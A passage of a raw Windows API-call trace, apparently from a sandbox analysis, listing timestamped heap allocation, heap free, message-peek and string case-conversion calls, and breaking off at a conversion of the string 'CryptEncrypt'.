hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0107.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0107.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0107.185] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0107.185] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0107.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.185] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0107.186] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0107.186] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0107.186] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0107.186] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0107.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.187] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0107.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0107.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0107.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0107.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0107.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0107.188] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0107.188] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0107.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0107.188] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0107.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0107.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0107.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0107.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0107.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 